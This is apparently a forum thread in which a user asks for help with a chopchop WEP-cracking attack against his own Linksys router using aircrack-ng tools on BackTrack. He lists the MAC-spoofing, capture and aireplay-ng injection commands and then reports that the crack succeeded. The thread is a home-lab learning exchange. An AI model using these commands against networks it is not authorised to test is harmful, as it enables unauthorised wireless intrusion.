ChopChop WEP attack with IPW2200
Hi all, hoping you guys can point me in the right direction. I have been successful searching the forums, but I realized that I often know what to type but not WHY I'm typing it. I have just recently begun to explore the recommended Slax guides also.
I am "attacking" from a Dell laptop with an Intel 2200BG (yuck, I know). I managed to successfully dual boot BT2 with XP Pro.
The target is my Linksys WRT54G v2 running dd-wrt firmware (128-bit key WEP). My wife's desktop is connected to the Linksys to serve as the client.
Here's my process so far (using aircrack 0.9.1 if it matters):
modprobe ipw2200 rtap_iface=1
ifconfig eth1 up
ifconfig rtap0 up
#I think this creates rtap0 that I need to inject and listen. I also have no internet access until I do this. Why?
ifconfig eth1 up hw ether 00:11:22:33:44:55
#changes my MAC? Not really necessary (I don't yet MAC filter).
iwconfig eth1 essid <AP essid> channel <AP channel> key s:fakekey mode managed
#what does this accomplish?
airodump-ng --bssid <AP MAC> -w <dump file> rtap0
#begins listening with rtap0? The packet count begins climbing, but the data (IVs) stay very low (but I think this is normal with little/no traffic)
aireplay-ng -4 -a <AP MAC> -h <My "fake" MAC> -i rtap0 eth1
#begins reading packets (into the thousands).
This is where I get stuck. Isn't it supposed to eventually stop reading packets and ask if I want to "use this packet" (y or n)? I got it to do this once and continued on with packetforge -0 and aireplay -2 (IVs went soaring)!!!
Any insight as to what I am doing wrong?
If you read all these pages you will find that all of the commands are explained to an extent, and you should be able to see why the commands are strung together the way they are.
Thanks for the direction. I managed to successfully and repeatedly crack my WEP with both -3 and -4 attacks this evening. A lot of my confusion stemmed from the 2200BG. I straightened out which interface should be listening, which should be sending, proper modes, etc. and it began working.
Time to keep reading. Thanks